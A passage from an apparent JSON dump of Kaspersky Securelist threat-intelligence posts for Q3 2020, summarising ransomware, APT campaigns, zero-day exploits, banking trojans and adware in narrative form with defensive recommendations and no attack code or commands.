of files on specified network resources. 
WastedLocker also features a bypass for UAC (User Account Control) on Windows computers that allows the malware to silently elevate its privileges using a known bypass technique.\n\nWastedLocker uses a combination of AES and RSA algorithms to encrypt files, which is a standard for ransomware families. Files are encrypted using a single public RSA key. This would be a weakness if this ransomware were to be distributed in mass attacks, since a decryptor from one victim would have to contain the only private RSA key that could be used to decrypt the files of all victims. However, since WastedLocker is used in attacks targeted at a specific organization, this decryption approach is worthless in real-world scenarios. Encrypted files are given the extension garminwasted_info \u2013 and, unusually, a new info file is created for each of the victim's encrypted files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/31084831/sl_WastedLocker_04.png>)\n\n### CactusPete's updated Bisonal backdoor\n\nCactusPete is a Chinese-speaking APT threat actor that has been active since 2013. The group has typically targeted military, diplomatic and infrastructure victims in Japan, South Korea, Taiwan and the U.S. However, more recently the group has shifted its focus towards other Asian and Eastern European organizations.\n\nThis group, which we would characterize as having medium level technical capabilities, seems to have acquired greater support and has access to more complex code such as ShadowPad, which CactusPete deployed earlier this year against government, defence, energy, mining and telecoms organizations.\n\nNevertheless, the group continues to use less sophisticated tools. We recently reported the group's use of a [new variant of the Bisonal backdoor](<https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/>) to steal information, execute code on target computers and perform lateral movement within the network. 
Our research began with a single sample, but using the [Kaspersky Threat Attribution Engine](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>) (KTAE) we discovered more than 300 almost identical samples. All of these appeared between March 2019 and April this year \u2013 so the group has developed more than 20 samples per month! Bisonal is not advanced, relying instead on social engineering in the form of spear-phishing e-mails.\n\n### Operation PowerFall\n\nEarlier this year our technologies prevented an attack on a South Korean company. Our investigation uncovered two zero-day vulnerabilities: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. The exploits targeted the latest builds of Windows 10 and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.\n\nThe exploits operated in tandem. The victim was first targeted with a malicious script that, because of the vulnerability, was able to run in Internet Explorer. Then a flaw in the system service further escalated the privileges of the malicious process. As a result, the attackers were able to move laterally across the target network.\n\nWe reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for the elevation of privilege vulnerability (CVE-2020-0986): although, before our discovery, Microsoft hadn't considered exploitation of this vulnerability to be likely. The patch for this vulnerability was released on 9 June. The patch for the remote code vulnerability (CVE-2020-1380) was released on 11 August.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/12070837/CVE-2020-1380_list.png>)\n\nWe named this malicious campaign Operation PowerFall. 
While we have been unable to find a clear link to known threat actors, we believe that DarkHotel might be behind it. You can read more about it [here](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) and [here](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>).\n\n### The latest activities of Transparent Tribe\n\nTransparent Tribe, a prolific threat actor that has been active since at least 2013, specializes in cyber-espionage. The group's main malware is a custom .NET Remote Access Trojan (RAT) called Crimson RAT, spread by means of spear-phishing e-mails containing malicious Microsoft Office documents.\n\nDuring [our investigation into the activities of Transparent Tribe](<https://securelist.com/transparent-tribe-part-1/98127/>), we found around 200 Crimson RAT samples. Kaspersky Security Network (KSN) telemetry indicates that there were more than a thousand victims in the year following June 2019. The main targets were diplomatic and military organizations in India and Pakistan.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19105713/sl_transparent_tribe_20.png>)\n\nCrimson RAT includes a range of functions for harvesting data from infected computers. The latest additions include a server-side component used to manage infected client machines and a USB worm component developed for stealing files from removable drives, spreading across systems by infecting removable media and downloading and executing a thin-client version of Crimson RAT from a remote server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/19101103/sl_transparent_tribe_01.png>)\n\nWe also discovered a [new Android implant used by Transparent Tribe](<https://securelist.com/transparent-tribe-part-2/98233/>) to spy on mobile devices. 
The threat actor used social engineering to distribute the malware, disguised as a fake porn video player and a fake version of the Aarogya Setu COVID-19 tracking app developed by the government of India.\n\nThe app is a modified version of the AhMyth Android RAT, open source malware, downloadable from GitHub and built by binding a malicious payload inside legitimate apps. The malware is designed to collect information from the victim's device and send it to the attackers.\n\n### DeathStalker: mercenary cybercrime group\n\nIn August, we reported the activities of a cybercrime group that specializes in stealing trade secrets \u2013 mainly from fintech companies, law firms, and financial advisors, although we've also seen an attack on a diplomatic entity. The choice of targets suggests that this group, which we have named DeathStalker, is either looking for specific information to sell, or is a mercenary group offering an 'attack on demand' service. The group has been active since at least 2018; but it's possible that the group's activities could go back further, to 2012, and may be linked to the Janicab and Evilnum malware families.\n\nWe have seen Powersing-related activities in Argentina, China, Cyprus, Israel, Lebanon, Switzerland, Taiwan, Turkey, the UK and the UAE. We also located Evilnum victims in Cyprus, India, Lebanon, Russia, Jordan and the UAE.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/25072903/Map_Powersing_Evilnum_upd.png>)\n\nThe group's use of a PowerShell implant called Powersing first brought DeathStalker to our attention. The operation starts with spear-phishing e-mails with attached archives containing a malicious LNK file. 
If the victim clicks on the archive, it starts a convoluted sequence resulting in the execution of arbitrary code on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145157/sl_decepticons_deathstalker_03.png>)\n\nPowersing periodically takes screenshots on the victim's computer and sends them to the C2 (Command and Control) server. It also executes additional PowerShell scripts that are downloaded from the C2 server. So Powersing is designed to provide the attackers with an initial point of presence on the infected computer from which to install additional malware.\n\nDeathStalker camouflages communication between infected computers and the C2 server by using public services as dead drop resolvers: these services allow the attackers to store data at a fixed URL through public posts, comments, user profiles, content descriptions, etc.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21145258/sl_decepticons_deathstalker_04.png>)\n\nDeathStalker offers a good example of what small groups or even skilled individuals can achieve, without the need for innovative tricks or sophisticated methods. DeathStalker should serve as a baseline of what organizations in the private sector should be able to defend against, since groups of this sort represent the type of cyber-threat companies today are most likely to face. We advise defenders to pay close attention to any process creation related to native Windows interpreters for scripting languages, such as powershell.exe and cscript.exe: wherever possible, these utilities should be made unavailable. 
Security awareness training and security product assessments should also include infection chains based on LNK files.\n\nYou can read more about DeathStalker [here](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>).\n\n## Other malware\n\n### The Tetrade: Brazilian banking malware goes global\n\nBrazil has a well-established criminal underground and local malware developers have created many banking Trojans over the years. Typically, this malware is used to target customers of local banks. However, Brazilian cybercriminals are starting to expand their attacks and operations abroad, targeting other countries and banks. [The Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>) is our designation for four large banking Trojan families that have been created, developed and spread by Brazilian criminals, but which are now being used at a global level. The four malware families are Guildma, Javali, Melcoz and Grandoreiro.\n\nWe have seen [attempts to do this before](<https://securelist.com/brazilian-trojans-beyond-borders/30879/>), with limited success using very basic Trojans. The situation is now different. Brazilian banking Trojans have evolved greatly, with hackers adopting techniques for bypassing detection, creating highly modular and obfuscated malware and using a very complex execution flow \u2013 making analysis more difficult. Notwithstanding the banking industry's adoption of technologies aimed at protecting customers, including the deployment of plugins, tokens, e-tokens, two-factor authentication, CHIP and PIN credit, fraud continues to increase because Brazil still lacks proper cybercrime legislation.\n\nBrazilian criminals are benefiting from the fact that many banks operating in Brazil also have operations elsewhere in Latin America and in Europe, making it easy to extend their attacks to customers of these financial institutions. 
They are also rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries, adopting MaaS (Malware-as-a-Service) and quickly adding new techniques to their malware as a way to keep it relevant and financially attractive to their partners.\n\nThe banking Trojan families are seeking to innovate by using DGA (Domain Generation Algorithm), encrypted payloads, process hollowing, DLL hijacking, a lot of LoLBins, fileless infections and other tricks to obstruct analysis and detection. We believe that these threats will evolve to target more banks in more countries.\n\nWe recommend that financial institutions monitor these threats closely, while improving their authentication processes, boosting anti-fraud technology and threat intelligence data to understand and mitigate such risks. Further information on these threats, along with IoCs, YARA rules and hashes, is available to customers of our [Financial Threat Intelligence services](<https://www.kaspersky.com/enterprise-security/threat-intelligence>).\n\n### The dangers of streaming\n\nHome entertainment is changing as the adoption of streaming TV services increases. The global market for streaming services is [estimated to reach $688.7 billion by 2024](<https://www.businesswire.com/news/home/20200205005541/en/Global-Video-Streaming-Market-Estimated-Generate-688.7>). For cybercriminals, the widespread adoption of streaming services offers a new, potentially lucrative attack vector. For example, just hours after Disney+ was launched last November, [thousands of accounts were hacked](<https://www.zdnet.com/article/thousands-of-hacked-disney-accounts-are-already-for-sale-on-hacking-forums/>) and people's passwords and email details were changed. 
The criminals sold the compromised accounts online for between $3 and $11.\n\nEven established services, such as Netflix and Hulu, are prime targets for distributing malware, [stealing passwords](<https://www.usatoday.com/story/tech/columnist/2019/08/31/did-someone-steal-your-netflix-password/2168504001/>) and launching spam and phishing attacks. The spike in the number of subscribers in the wake of the COVID-19 pandemic has provided cybercriminals with an even bigger pool of potential victims. In the first quarter of this year, [Netflix added fifteen million subscribers](<https://www.theverge.com/2020/4/21/21229587/netflix-earnings-coronavirus-pandemic-streaming-entertainment>)\u2014more than double what had been anticipated.\n\nWe took an [in-depth look at the threat landscape as it relates to streaming services](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>). Unsurprisingly, phishing is one of the approaches taken by cybercriminals, as they seek to trick people into disclosing login credentials or payment information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15124324/sl_tv_report_06.png>)\n\nThe criminals also capitalize on the growing interest in streaming services to distribute malware and adware. Typically, backdoors and other Trojans are downloaded when people attempt to gain access through unofficial means \u2013 by purchasing discounted accounts, obtaining a 'hack' to keep their free trial going, or attempting to access a free subscription. 
The chart below shows the number of people that encountered various threats containing the names of popular streaming platforms while trying to access these platforms through unofficial means between January 2019 and 8 April 2020:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/15134838/01-en-graph-depicting.png>)\n\nThe chart below shows the mix of malicious programs disguised under the name of popular streaming platforms between January 2019 and 8 April 2020:\n\nYou can read the full report [here](<https://securelist.com/the-streaming-wars-a-cybercriminals-perspective/97851/>), including our guidance on how to avoid phishing scams and malware related to streaming services.\n\n### Threats facing digital education\n\nOnline learning became the norm in the wake of the COVID-19 pandemic, as classrooms and lecture theatres were forced to close. Unfortunately, many educational institutions did not have proper cyber-security measures in place, putting online classrooms at increased risk of cyber-attacks. On 17 June, Microsoft Security Intelligence reported that the [education industry accounted for 61 percent of the 7.7 million malware encounters by enterprises](<https://edtechmagazine.com/k12/article/2020/06/cyberattacks-increasingly-threaten-schools-heres-what-know-perfcon>) in the previous 30 days \u2013 more than any other sector. 
In addition to malware, educational institutions also faced an increased risk of data breaches and violations of student privacy.\n\nWe recently published an overview of the threats facing schools and universities, including phishing related to online learning platforms and video conferencing applications, threats camouflaged as applications related to online learning and DDoS (Distributed Denial of Service) attacks affecting education.\n\nIn the first half of 2020, 168,550 people encountered various threats disguised as popular online learning platforms \u2013 a massive increase compared to just 820 in the same period the previous year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104901/02-en-education-report.png>)\n\nThe platform used most frequently as a lure was Zoom, with 99.5 per cent of detections, no surprise given the popularity of this platform.\n\nThe overwhelming majority of threats distributed under the guise of legitimate video conferencing and online learning platforms were riskware and adware. 
Adware bombards users with unwanted adverts, while riskware consists of various files \u2013 including browser bars, download managers and remote administration tools \u2013 that may carry out various actions without consent.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03104938/03-en-education-report.png>)\n\nIn Q1 2020, the total number of DDoS attacks increased globally by 80 per cent when compared to the same period in 2019: and a large proportion of this increase can be attributed to attacks on distance e-learning services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/09/03105019/04-en-education-report.png>)\n\nThe number of DDoS attacks affecting educational resources that occurred between January and June this year increased by at least 350 per cent when compared to the same period in 2019.\n\nIt's likely that online learning will continue to grow in the future and cybercriminals will seek to exploit this. So it's vital that educational institutions review their cyber-security policy and adopt appropriate measures to secure their online learning environments and resources.\n\nYou can read our full report [here](<https://securelist.com/digital-education-the-cyberrisks-of-the-online-classroom/98380/>).\n\n### Undeletable adware on smartphones\n\nWe've highlighted the issue of intrusive advertisements on smartphones a number of times in the past (you can find recent posts [here](<https://securelist.com/dropper-in-google-play/92496/>) and [here](<https://securelist.com/in-app-advertising-in-android/97065/>)). While it can be straightforward to remove [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), there are situations where it's much more difficult because the [adware is installed in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). 
In such cases, trying to remove it can cause the device to fail. In addition, ads can be embedded in undeletable system apps and libraries at the code level. According to our data, 14.8 per cent of all users attacked by malware or adware in the last year suffered an infection of the system partition.\n\nWe have observed two main strategies for introducing undeletable adware onto a device. First, the malware obtains root access and [installs adware in the system partition](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>). Second, the code for displaying ads (or its loader) gets into the firmware of the device even before it reaches the consumer. Our data indicates that between one and five per cent of people running our mobile security solutions have encountered this. In the main, these are owners of smartphones and tablets of certain brands in the lower price segment. For some popular vendors offering low-cost devices, this figure reaches 27 per cent.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/30143828/sl_pre-installed_ads_01.png>)\n\nSince the Android security model assumes that anti-virus is a normal app, it is unable to do anything about [adware or malware in system directories](<https://securelist.com/pig-in-a-poke-smartphone-adware/97607/>), making this a serious problem.\n\nOur investigations show that the focus of some mobile device suppliers is on maximizing profits through all kinds of advertising tools, even if such tools cause inconvenience to device owners. 
If advertising networks are ready to pay for views, clicks, and installations regardless of their source, it makes sense for them to embed ad modules into devices to increase the profit from each device sold.", "modified": "2020-11-20T10:00:58", "published": "2020-11-20T10:00:58", "id": "SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "href": "https://securelist.com/it-threat-evolution-q3-2020/99382/", "type": "securelist", "title": "IT threat evolution Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. 
The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. 
The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. 
Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seeks directories that exist only in the Cyrillic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. 
The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public-facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither the rootkit nor the other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. 
While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. 
(aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. 
In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. 
A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. 
We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here ](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. 
Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. 
While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. 
We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such as COVID-19 to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, the MosaicRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker are a recent example.\n * We continue to observe the use of mobile implants in 